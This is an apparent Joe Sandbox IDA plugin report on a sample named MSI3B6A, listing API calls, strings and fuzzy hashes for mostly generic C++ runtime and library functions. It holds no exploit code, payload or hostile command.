Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: ef3282a13505ac08731b52113b76189f5ae70e2834344de8c39002117efaaecf
Instruction ID: 8ab075abc668add246d2220eff944568437071e187f4faa46b1b19ec02fd0c72
Opcode Fuzzy Hash: ef3282a13505ac08731b52113b76189f5ae70e2834344de8c39002117efaaecf
Instruction Fuzzy Hash: BA21C7B1904B92EEDB65DF74849477B7EF8BB08300F04461AF099C7A82D738D601CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006F6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(DBD9785B,DBD9785B,?,?,00000000,00734981,000000FF), ref: 006F62EB

Part of subcall function 00712C98: EnterCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CA3
Part of subcall function 00712C98: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 006F62B0
GetProcAddress.KERNEL32(00000000), ref: 006F62B7

Part of subcall function 00712C4E: EnterCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C58
Part of subcall function 00712C4E: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C8B
Part of subcall function 00712C4E: RtlWakeAllConditionVariable.NTDLL ref: 00712D02

Strings

IsWow64Process, xrefs: 006F62A6
kernel32, xrefs: 006F62AB

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 7405b3139ef1d98f5ea758cc1291ae658cf8ee26f46ed607c2a6b023e42cedb8
Instruction ID: 6b97dc548732f0fbc3584689862b6c9d22e43ab3821da437f9a25f494961d25f
Opcode Fuzzy Hash: 7405b3139ef1d98f5ea758cc1291ae658cf8ee26f46ed607c2a6b023e42cedb8
Instruction Fuzzy Hash: 4E11E4B2D08718EFDB14CF54DD05BA9B3A8F715B20F10422AED15933D0E77D6900CA56

Uniqueness

Uniqueness Score: -1.00%

Function 007169E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00716AA3,?,?,0074DDCC,00000000,?,00716BCE,00000004,InitializeCriticalSectionEx,007397E8,InitializeCriticalSectionEx,00000000), ref: 00716A72

Strings

api-ms-, xrefs: 00716A32

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 0d8002462b64edc72fc73e803c11a10b61948932edb35e2587684ab512826ce3
Instruction ID: 2a75a6a85e7c4a0a5fbea51874a386d59cb6b40fb74e66cbec18389321043e47
Opcode Fuzzy Hash: 0d8002462b64edc72fc73e803c11a10b61948932edb35e2587684ab512826ce3
Instruction Fuzzy Hash: 3011A332A05225ABDB329B6C9C45BD933A49F01771F25C260F914FB2C0D678ED40C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 006FD752 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006FD759
std::_Lockit::_Lockit.LIBCPMT ref: 006FD763

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 006FD7B4
std::_Lockit::~_Lockit.LIBCPMT ref: 006FD7D4

Strings

2q, xrefs: 006FD7C1

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 4fe5e8f3ae78b7524e28e156dfe423c262ddca7dfd963a17aebe297236acf330
Instruction ID: 4306a25003f1836e780a3a67962dddcc1625dd7cc252f30ad483615a746d42df
Opcode Fuzzy Hash: 4fe5e8f3ae78b7524e28e156dfe423c262ddca7dfd963a17aebe297236acf330
Instruction Fuzzy Hash: B901AD36900119DFCB15BB64C846ABE77B3BF84320F240509EA006B3D1CF38AE008B95

Uniqueness

Uniqueness Score: -1.00%

Function 0070270D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702714
std::_Lockit::_Lockit.LIBCPMT ref: 0070271E

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070276F
std::_Lockit::~_Lockit.LIBCPMT ref: 0070278F

Strings

2q, xrefs: 0070277C

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: c6e79d9cbb2b39355296d6573a3a8fa4abfc2c023c26aff290722bba5f111211
Instruction ID: 3d5952c4b7580cd0debb60e3ee6416aebb149a4b9bc00512b95759507485632e
Opcode Fuzzy Hash: c6e79d9cbb2b39355296d6573a3a8fa4abfc2c023c26aff290722bba5f111211
Instruction Fuzzy Hash: EF01C036900119DFCB15FBA4C809BBE77B1BF84720F24060AE514A72D2CF7C9E028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 006FD7E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006FD7EE
std::_Lockit::_Lockit.LIBCPMT ref: 006FD7F8

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 006FD849
std::_Lockit::~_Lockit.LIBCPMT ref: 006FD869

Strings

2q, xrefs: 006FD856

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 763d37026b0b4858cd57ddec47dae8b2757eb6f46003069bb370f52d973fa4f1
Instruction ID: 1e8a514285d7c38f004cb8a4a4fcff7531bd4451eb25daaa34712f14a0a4bfef
Opcode Fuzzy Hash: 763d37026b0b4858cd57ddec47dae8b2757eb6f46003069bb370f52d973fa4f1
Instruction Fuzzy Hash: 4B01A936900119DFCB25BB64D846ABE77B2BF84720F24454AE6106B3D1CF38AE018B91

Uniqueness

Uniqueness Score: -1.00%

Function 007027A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007027A9
std::_Lockit::_Lockit.LIBCPMT ref: 007027B3

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702804
std::_Lockit::~_Lockit.LIBCPMT ref: 00702824

Strings

2q, xrefs: 00702811

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 0fc0779a2b19f6147f777626cd8b7518dd23b1c1014aeed3ce72db86925c2ec2
Instruction ID: 4cb018a80a485f1df8ab1af0bc8f22dc9951488cd5dd8d45c3cadeb010c15975
Opcode Fuzzy Hash: 0fc0779a2b19f6147f777626cd8b7518dd23b1c1014aeed3ce72db86925c2ec2
Instruction Fuzzy Hash: C601C436900219DBCB15EB64C8096BE77B5BF84720F244609E904A72D2CF3C9E05C791

Uniqueness

Uniqueness Score: -1.00%

Function 00702837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070283E
std::_Lockit::_Lockit.LIBCPMT ref: 00702848

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702899
std::_Lockit::~_Lockit.LIBCPMT ref: 007028B9

Strings

2q, xrefs: 007028A6

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: ea6540bb50dbdb8b164e9add754b5d136950d984960046722a5cb54a78e50fcf
Instruction ID: fb0f7ba0bce6c8f80db8769fdd8c2c7472defb056d457b8038227988c0c2d1bd
Opcode Fuzzy Hash: ea6540bb50dbdb8b164e9add754b5d136950d984960046722a5cb54a78e50fcf
Instruction Fuzzy Hash: F301C03A900129DFCB15EB64C809ABE77B6BF84720F254609E400A72D2DF3C9E018B91

Uniqueness

Uniqueness Score: -1.00%

Function 007028CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007028D3
std::_Lockit::_Lockit.LIBCPMT ref: 007028DD

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070292E
std::_Lockit::~_Lockit.LIBCPMT ref: 0070294E

Strings

2q, xrefs: 0070293B

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: d2f9b882babd72ad7bc58d90980fec5efd07e475c5c6eb523c6d63f37eab6050
Instruction ID: 7eff044eb5d83f0227537303b19843323155d1a8a9640b1ac0d618c12c56090e
Opcode Fuzzy Hash: d2f9b882babd72ad7bc58d90980fec5efd07e475c5c6eb523c6d63f37eab6050
Instruction Fuzzy Hash: 0A01C036900219DFCB14EB64D819ABE77B5BF84720F244609E510A72D2CF7CAE028B90

Uniqueness

Uniqueness Score: -1.00%

Function 0070E96D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070E974
std::_Lockit::_Lockit.LIBCPMT ref: 0070E97E

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070E9CF
std::_Lockit::~_Lockit.LIBCPMT ref: 0070E9EF

Strings

2q, xrefs: 0070E9DC

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 225f52aa295b50828c72ea0a8932af889c829e6e206564ed57607138abad3ce8
Instruction ID: 998ce5666ef9338ed2001de05ad41b73e5573b1c57f87d1bbb84640ad2ba6220
Opcode Fuzzy Hash: 225f52aa295b50828c72ea0a8932af889c829e6e206564ed57607138abad3ce8
Instruction Fuzzy Hash: E801C035900119DBCB15EB64C806ABEB7B5BF84320F254A09F540AB3D2CF3CAE008B95

Uniqueness

Uniqueness Score: -1.00%

Function 0070EA02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070EA09
std::_Lockit::_Lockit.LIBCPMT ref: 0070EA13

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070EA64
std::_Lockit::~_Lockit.LIBCPMT ref: 0070EA84

Strings

2q, xrefs: 0070EA71

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: f319bc8883d28d3733719bb3429ce7100995edf176bb5d5e96801777db277375
Instruction ID: abb0b3d329e57c2be23d63748bfabcb0e2c876d20efb71098fadd3f0da13e4f6
Opcode Fuzzy Hash: f319bc8883d28d3733719bb3429ce7100995edf176bb5d5e96801777db277375
Instruction Fuzzy Hash: 7C01C075900119DFCB14FB64C845ABE77B1BF88720F294A09E400AB2D2CF7CAE018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0070EBC1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070EBC8
std::_Lockit::_Lockit.LIBCPMT ref: 0070EBD2

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070EC23
std::_Lockit::~_Lockit.LIBCPMT ref: 0070EC43

Strings

2q, xrefs: 0070EC30

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 7c14499f0e7b9da86327cc89cfc9b9618f4b56e7deaff4df0f342d5d3ada0503
Instruction ID: 771896b199fe357c02a0aa28ecec726bf3c2a8a05fc000fd4faf86fdc9d385e6
Opcode Fuzzy Hash: 7c14499f0e7b9da86327cc89cfc9b9618f4b56e7deaff4df0f342d5d3ada0503
Instruction Fuzzy Hash: 6701C435900119DBDB14EB64C80A6BE77B1BF84720F150A49E510A72D1CF7CAE008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00702BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702BBC
std::_Lockit::_Lockit.LIBCPMT ref: 00702BC6

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702C17
std::_Lockit::~_Lockit.LIBCPMT ref: 00702C37

Strings

2q, xrefs: 00702C24

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 530e14314945262dd8080ae7346512b33d32b0f2afe1ef76f524a5abf9cff8c5
Instruction ID: dc41256448b2cec5db0e51b52d41ba3aa6efd4d0136c53edbb472ad4479d238b
Opcode Fuzzy Hash: 530e14314945262dd8080ae7346512b33d32b0f2afe1ef76f524a5abf9cff8c5
Instruction Fuzzy Hash: C3018436900119DFDB19EB64D8096BE77F1BF44710F25461AE500A72D2DF7C9E01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0070EC56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070EC5D
std::_Lockit::_Lockit.LIBCPMT ref: 0070EC67

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 0070ECB8
std::_Lockit::~_Lockit.LIBCPMT ref: 0070ECD8

Strings

2q, xrefs: 0070ECC5

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: da6ca6488f0694164881c9d5a91c54c013064e733f57cda7955be0a2fd8099f5
Instruction ID: 57a0a610b67242378080410c1816375e9b15a2ddec857ccd9ed2331888c86660
Opcode Fuzzy Hash: da6ca6488f0694164881c9d5a91c54c013064e733f57cda7955be0a2fd8099f5
Instruction Fuzzy Hash: 6101C035900119DBDB15FB64C849ABE77B1BF84720F254A19F401A72D1DF7CAE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00702C4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702C51
std::_Lockit::_Lockit.LIBCPMT ref: 00702C5B

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702CAC
std::_Lockit::~_Lockit.LIBCPMT ref: 00702CCC

Strings

2q, xrefs: 00702CB9

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: ef8b875b05d10d16f90b3ccea7bc83e246debd14b6a9861a0b3f73571f63e40c
Instruction ID: 04283f54c2f7bc5a193979fa68a7c8cd9e99b1f96fa62495b0214f0b932814eb
Opcode Fuzzy Hash: ef8b875b05d10d16f90b3ccea7bc83e246debd14b6a9861a0b3f73571f63e40c
Instruction Fuzzy Hash: BA01C036901119DBDB14EBA4D809ABE77B1BF84720F25460AF500A72D2CF7C9E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00702CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702CE6
std::_Lockit::_Lockit.LIBCPMT ref: 00702CF0

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702D41
std::_Lockit::~_Lockit.LIBCPMT ref: 00702D61

Strings

2q, xrefs: 00702D4E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
API String ID: 2854358121-950290719
Opcode ID: 840eb8013bb50248e6071cdc0e96485e16ef9c3bc3cca74e1d82b12b275c3c99
Instruction ID: 462e7372112eda471bb88184ebf6bf6b89f06ff63d70014754180ae9d2fcbabf
Opcode Fuzzy Hash: 840eb8013bb50248e6071cdc0e96485e16ef9c3bc3cca74e1d82b12b275c3c99
Instruction Fuzzy Hash: BB01A136A00119DBCB25AB64D849ABE77B1BF84720F150649E500B72D2CF7C9E018791

Uniqueness

Uniqueness Score: -1.00%

Function 00702E09 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00702E10
std::_Lockit::_Lockit.LIBCPMT ref: 00702E1A

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

std::_Facet_Register.LIBCPMT ref: 00702E6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00702E8B

Strings

2q, xrefs: 00702E78

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2q
